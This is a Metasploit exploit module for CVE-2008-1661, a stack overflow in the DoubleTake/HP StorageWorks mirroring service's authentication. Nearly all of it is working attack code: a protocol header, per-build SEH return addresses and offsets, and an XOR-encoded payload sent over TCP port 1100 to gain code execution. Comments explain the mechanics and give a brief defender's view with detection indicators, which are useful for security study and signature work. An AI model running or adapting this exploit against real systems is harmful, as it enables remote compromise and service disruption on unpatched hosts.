##
# $Id: doubletake.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

# Metasploit exploit module for CVE-2008-1661 (OSVDB 45924): a stack buffer
# overflow in the authentication handler of the DoubleTake / HP StorageWorks
# Storage Mirroring service. It is a single-shot SEH overwrite
# (Msf::Exploit::Remote::Seh) over a plain TCP connection, port 1100 by
# default (see register_options). Nothing is ever read back from the
# service, so the target build is not fingerprinted; it comes entirely from
# the selected 'Targets' entry.
#
# Per-target values: 'Ret' is passed to generate_seh_payload as the SEH
# handler address and 'Offset' sizes the filler placed before the SEH frame.
# Both are build-specific (4.4.2 uses 944 bytes versus 5544 for the two
# 4.5.0 builds), so a mismatched target most likely only crashes the service.
#
# Defender's view: on the wire this is a fixed header, then a long run of a
# single repeated ASCII letter, then an XOR-obfuscated tail — a distinctive
# pattern for a TCP/1100 signature. With EXITFUNC 'process' the service
# process exits once the payload finishes, so unexpected restarts or crashes
# of the mirroring service are a useful host-side indicator.
class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Registers the module metadata (name, references, payload constraints,
  # targets) with the framework. Payload space is capped at 500 bytes and
  # only NUL is a bad character; the three targets differ only in name,
  # 'Ret' and 'Offset'.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow',
      'Description'=> %q{
This module exploits a stack buffer overflow in the authentication mechanism of
NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability
was found by Titon of Bastard Labs.},
      'Author' => ['ri0t <ri0t[at]ri0tnet.net>'],
      'Version'=> '$Revision: 9669 $',
      'References' =>
        [
          ['CVE','2008-1661'],
          ['OSVDB','45924'],
        ],
      'Privileged' => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'=>
        {
          'Space'=> 500,
          'BadChars' => "\x00",
        },
      'Platform' => 'win',
      'Targets'=>
        [
          # 'Ret': SEH handler address handed to generate_seh_payload.
          # 'Offset': number of filler bytes sent before the SEH frame.
          ['doubletake 4.5.0',{'Ret' => 0x006f5fa7,'Offset' => 5544 }],
          ['doubletake 4.4.2',{'Ret' => 0x0074e307,'Offset' => 944}],
          ['doubletake 4.5.0.1819',{'Ret' => 0x006e62dd,'Offset' => 5544 }],
        ],
      'DefaultTarget'=> 0,
      'DisclosureDate' => 'Jun 04 2008'))
    # The port is the only module-specific option; 1100 is the service default.
    register_options([
      Opt::RPORT(1100)], self.class)
  end

  # Builds and sends the single malformed authentication message, then runs
  # the payload handler. The socket is never read, only written to.
  def exploit
    connect
    print_status("Trying target #{target.name}...")
    # Fixed 58-byte message header; its field meanings are not documented in
    # this module.
    header =
      "\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"+
      "\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01"
    xor = Rex::Encoding::Xor::Byte
    # One random English letter repeated target['Offset'] times; this is the
    # padding that reaches the SEH frame (presumably — the exact layout of the
    # overflowed buffer is not stated here).
    filler =rand_text_english(1)*(target['Offset'])
    # SEH frame from the Seh mixin, using the per-target 'Ret' as the handler.
    seh = generate_seh_payload(target.ret)
    # Single-byte XOR (key 0xf0) over the SEH frame plus the encoded payload.
    # Because the SEH frame itself is XOR'd, the service presumably decodes
    # the authentication field with the same key before the overflow occurs
    # (inferred, not stated). encode returns an array; element 0 is taken as
    # the encoded data — confirm against Rex::Encoding::Xor::Byte.
    buffercoded = xor.encode(seh+payload.encoded,[0xf0].pack("C"))
    sploit =header + filler + buffercoded[0]
    sock.put(sploit)
    handler
    disconnect
  end
end